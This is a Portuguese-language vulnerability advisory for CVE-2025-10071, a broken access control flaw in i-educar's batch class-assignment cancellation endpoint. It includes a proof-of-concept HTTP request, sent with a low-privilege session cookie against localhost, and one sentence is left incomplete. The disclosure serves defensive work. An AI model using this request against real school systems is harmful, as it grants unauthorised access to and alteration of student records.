Featured image of post CVE-2025-10071

CVE-2025-10071

Controle de Acesso Quebrado

CVE-2025-10071: Controle de Acesso Quebrado no Endpoint /cancelar-enturmacao-em-lote/[ID]

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10071

Resumo

Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint /cancelar-enturmacao-em-lote/[ID] do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.

Detalhes

Endpoint Vulnerável: GET /cancelar-enturmacao-em-lote/[ID]
Autenticação: Obrigatória

O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .

PoC

  • Autenticar como um usuário sem privilégios.

  • Enviar a seguinte solicitação:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
GET /cancelar-enturmacao-em-lote/15 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Referer: http://localhost/enturmacao-em-lote/15
Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

  • Podemos observar que temos acesso à página e à função para atribuir alunos em lote às turmas. E este usuário não deveria fazer isso.

Impacto

Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:

  • Acesso não autorizado a funcionalidades restritas;
  • Escalonamento de privilégios para usuários de baixo nível;
  • Exposição de dados sensíveis e potencial comprometimento do sistema;
  • Perda de confidencialidade e integridade de registros educacionais;
  • Danos à reputação da organização.

Referência

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md

Finder

Marcelo Queiroz

Por: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy